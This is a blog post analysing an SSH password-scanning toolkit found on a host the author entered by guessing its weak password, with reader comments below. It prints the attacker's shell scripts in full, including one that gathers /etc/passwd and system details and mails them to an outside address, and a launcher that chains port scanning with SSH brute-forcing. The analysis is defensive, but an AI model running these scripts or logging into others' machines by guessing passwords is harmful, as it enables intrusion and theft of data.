Having setup my ssh honeypot, I had my first guest. I thought it might be a victim, so I tried to see whether it has a weak password. It turned out to be really weak. I got it on my second guess. It’s a x86 machine running RHEL5 and has an public IP address in Beijing. A quick glance at the running processes showed no obvious malicious processes. The bash history showed the most recent command was go.sh.
68 cd /root/ 69 ls 70 cd lamp-auto 71 ls 72 sh lamp-auto.sh 73 cd 74 cd /root/gosh 75 ./go.sh 91
I don’t know why the hacker didn’t clear the history, but I’m certain that the hacker was the most recent logined user before me. The lastlog showed the previous login was from SC Aries Networks Group SRL (Romania). I believe this was from the hacker. It’s unlikely he created a fake lastlog. I tried to access that address but it was offline.
OK, let’s see that’s in /root/gosh.
[root@foo gosh]$ ls -al total 9500 drwx--x--x 2 root root 4096 Jan 11 14:09 . drwxrwxr-x. 10 root root 4096 Jan 11 21:50 .. -rwx--x--x 1 root root 3346659 Jul 23 2006 1 -rwx--x--x 1 root root 54703 Apr 20 2008 2 -rwx--x--x 1 root root 28956 Apr 21 2008 3 -rwx--x--x 1 root root 54703 Apr 20 2008 4 -rwx--x--x 1 root root 26857 Aug 23 2005 5 -rwx--x--x 1 root root 1227 Jul 12 2011 a -rw-r--r-- 1 root root 2830095 Jan 11 16:40 bios.txt -rwx--x--x 1 root root 22354 Dec 2 2004 common -rwx--x--x 1 root root 265 Nov 25 2004 gen-pass.sh -rwx--x--x 1 root root 120 Jul 30 2011 go.sh -rwx--x--x 1 root root 1972243 Jan 11 16:40 mfu.txt -rwx--x--x 1 root root 806 Jun 24 2012 pass_file -rwx--x--x 1 root root 21407 Jul 22 2004 pscan2 -rwx--x--x 1 root root 5908 Jul 12 2011 scam -rwx--x--x 1 root root 197 Aug 23 2005 secure -rwx--x--x 1 root root 453972 Jul 13 2004 ss -rwx--x--x 1 root root 842736 Nov 24 2004 ssh-scan -rwxr-xr-x 1 root root 10974 Jan 11 16:59 vuln.txt [root@foo gosh]$ file * 1: C++ source, ISO-8859 text, with CRLF line terminators 2: C source, ASCII text 3: C++ source, ASCII text, with CRLF line terminators 4: C source, ASCII text 5: ASCII text a: ISO-8859 text bios.txt: ASCII text common: C++ source, ASCII text gen-pass.sh: Bourne-Again shell script, ASCII text executable go.sh: ASCII text mfu.txt: ASCII text pass_file: ASCII text pscan2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped scam: Bourne-Again shell script, ASCII text executable secure: Bourne-Again shell script, ASCII text executable ss: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.0.0, stripped ssh-scan: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.0.0, stripped vuln.txt: ASCII text
The file 1 to 5 and pass_file are username and password pairs. Those are password dictionaries, no surprise, except there are two interesting long passwords, 7hur@y@t3am$#@!(*( and JFKGHDj3587561346tyhsdfgDFH75q4yeatHADF. Google gives a few hits, but no interesting finding. bios.txt is a list of 205763 IP addresses, including mine. No wonder I’m scanned. go.sh is the one in the bash history. Here’s the script:
perl pscan3 ./ss 22 -a $1 -i eth0 -s 10 cat bios.txt |sort | uniq > mfu.txt ./ssh-scan 300 rm -f bios.txt rm -rf pscan3
There is no file named pscan3, so I don’t know what the first line means. pscan2 is an ELF32 executable. The help message is:
Usage: ./pscan2 <b-block> <port> [c-block]
Other strings from the executable are
%s.pscan.%s %s.%s.pscan.%s Invalid b-range. # scanning: %s.%d.* (total: %d) (%.1f%% done) Unable to allocate socket. Unable to set O_NONBLOCK %s.%d.%d Invalid IP. # pscan completed in %u seconds. (found %d ips) Y@%s Error: %s
So it’s a port scanner. Nothing fun. Let’s move to ss. The help message is:
usage: ./ss <port> [-a <a class> | -b <b class>] [-i <interface] [-s <speed>] speed 10 -> as fast as possible, 1 -> it will take bloody ages (about 50 syns/s)
The hacker’s command was ./ss 22 -a 91 -i eth0 -s 10, so he’s a impatient person. From the strings in the executable, it looks like another port scanner. It uses libpcap to get the reply. The pcap filter (found in the strings dump) is (tcp[tcpflags]=0x12) and (src port %d) and (dst port %d), which selects ACK|SYN packets. Googling it’s SHA1 b45ae5d8d3069ee7f880dd461c931fa711b6ad3d gives me a virustotal report. Detection ratio is 30/46, so it’s quite well known.
OK, the last ELF file, ssh-scan. There isn’t any useful help message this time. From the strings, it looks like a ssh scanner. This is my guess: it reads IP addresses in mfu.txt, user:password pairs in pass_file, and output login results in vuln.txt. All file names are hard coded. I tried a few hosts in vuln.txt, some can login. ssh-scan’s SHA1 4f64a5b07b0c128771ea21bf4aa15610fc6b071c also gets hit in virustotal, with 30/42 detection ratio.
The shell script scam is used to mail the scan result to the hacker.
#!/bin/bash
echo "[+] [+] [+] RK [+] [+] [+]" >> info2
echo "[+] [+] [+] IP [+] [+] [+]" >> info2
/sbin/ifconfig -a >> info2
echo "[+] [+] [+] uptime [+] [+] [+]" >> info2
uptime >> info2
echo "[+] [+] [+] uname -a [+] [+] [+]" >> info2
uname -a >> info2
echo "[+] [+] [+] /etc/issue [+] [+] [+]" >> info2
cat /etc/issue >> info2
echo "[+] [+] [+] passwd [+] [+] [+]" >> info2
cat /etc/passwd >> info2
echo "[+] [+] [+] id [+] [+] [+]" >> info2
id >> info2
echo "[+] [+] [+] Spatiu Hdd / pwd [+] [+] [+]" >> info2
df -h >> info2
pwd >> info2
cat info2 | mail -s "Scanner MaLa Port : ?? | Pass : stii tu :))" DaNioN@bk.ru
rm -rf info2
clear
echo "####################################################################"
echo "# ______ "
echo "# .-. .-. "
echo "# / \ "
echo "# | zRR | "
echo "# |, .-. .-. ,| "
echo "# | )(z_/ \z_)( | "
echo "# |/ /\ \| "
echo "# _ (_ ^^ _) "
echo "# _\ ____) \_______\__|IIIIII|__/_________________________ "
echo "# (_)[___]{}<________|-\IIIIII/-|__zRR__zRR__zRR___________\ "
echo "# / )_/ \ / "
echo "# \ ______ / "
echo "# SCANER PRIVAT "
echo "# SCANER FOLOSIT DOAR DE TEAMUL MaLaSorTe "
echo "# SACNERUL CONTINE UN PASS_FLIE DE 3MEGA !! "
echo "####################################################################"
if [ -f a ]; then
cat vuln.txt |mail -s "gosh" DaNioN@bk.ru
./a $1.0
./a $1.1
./a $1.2
./a $1.3
./a $1.4
./a $1.5
./a $1.6
./a $1.7
./a $1.8
./a $1.9
./a $1.10
cat vuln.txt |mail -s "gosh" DaNioN@bk.ru
./a $1.11
...
./a $1.255
killall -9 a
else
echo # Ciudat ..Nu Ai Urmat Instructiunile #
echo # trebui dat mv assh a sau mv scan a #
echo # orice ai avea tu ... dohh .. #
killall -9 a
killall -9 pscan2
fi
I can’t see any trace of this script been executed in this host. Google translate suggests it’s Romanian, but the hacker might not be the script author. Nevertheless, the language and the IP address match! The hacker’s email is DaNioN@bk.ru, which has only one Google hit. The script ./a prepares the input for ssh-scan and launches ssh-scan.
#!/bin/bash
if [ $# != 1 ]; then
echo " usage: $0 <b class>"
exit;
fi
echo -e "33[1;31m?33[1;32m Created bY zRR 33[1;31m?33[0m"
echo "INCERC SA DAU VIATZA CIBERNETICI"
./pscan2 $1 22
sleep 10
cat $1.pscan.22 |sort |uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
echo "# SA VEDEM CE PULA MEA FACEM"
echo "# _\ ____) \_______ "
echo "# (_)[_bY_]{}<zRR> "
echo "# / )_/ "
echo "#.......si DE root ....... "
echo " "
echo -e "Checking33[1;34m user file33[0m pass 1"
cp 1 pass_file
./ssh-scan 100
sleep 3
echo -e "Checking33[1;31m root file33[0m pass 2"
cp 2 pass_file
./ssh-scan 100
sleep 3
echo -e "Checking33[1;34m user file33[0m pass 3"
cp 3 pass_file
./ssh-scan 100
sleep 3
echo -e "Checking33[1;34m user file33[0m pass 4"
cp 4 pass_file
./ssh-scan 100
sleep 3
echo -e "Checking33[1;31m root file33[0m pass 5"
cp 5 pass_file
./ssh-scan 100
rm -rf $1.pscan.22 mfu.txt
echo -e "33[1;31m?33[1;32mFuck .. continuam .. 33[1;31m?33[0m"
It even has terminal color. That’s quite uncommon for a background scanning tool. The hacker can’t sit there and watch the scanning, so what’s the purpose?
To conclude, this is a simple SSH password scanner. It’s simple in the sense it doesn’t propagate itself. The hacker has to manually install and launch it in a newly acquired host.
Wu Yongzheng's Blog 
2013/01/25 at 4:47 am |
FYI, the language in the comments is indeed Romanian (with typos!), but the comments are (partially) guidance/help, almost like it was designed by someone and run by other people (less skilled). Maybe this is why it has nice output, as it was custom made (and the hacker wanted to look nice to the client)?
2013/01/25 at 2:05 pm |
Hi Iustin,
So this guy seems like a script kiddie. Given that the script is not publicly available (at least I can’t find any), there must be some Romanian underground community developing/distributing the tools.
2014/01/31 at 9:14 am
it is a script kiddie …many so called Teams modify this to look cool :) … you can find this guys on UnderNet irc server .
MaLaSorTe is ~Cayte@119.161.132.197 * Keely
MaLaSorTe using *.undernet.org The Undernet Underworld
MaLaSorTe has been idle 2hrs 15mins 57secs, signed on Fri Jan 31 00:54:07
MaLaSorTe End of /WHOIS list.
this is just one of the SSH password scaner …..
2013/06/25 at 11:25 pm |
fuck you is now work anything teach me lol i want to teach how scanner videos
2014/02/16 at 4:02 pm |
Hey man, so glad to have found this! Just hit by the same guy, same “gosh” file. Got some other interesting stuff he left behind if you’re interested
2014/02/17 at 1:21 pm |
Thanks for sharing. Probably a different guy with the same tool. If you think there is some interesting/helpful, you can post here.
2014/03/21 at 5:53 pm |
I just got hit with this same toolchain. Attackers entered through open ssh to postgres with defaults still enabled (including password). I know. I know. Anywho, they installed a counterstrike 1.6 server.
Kids these days.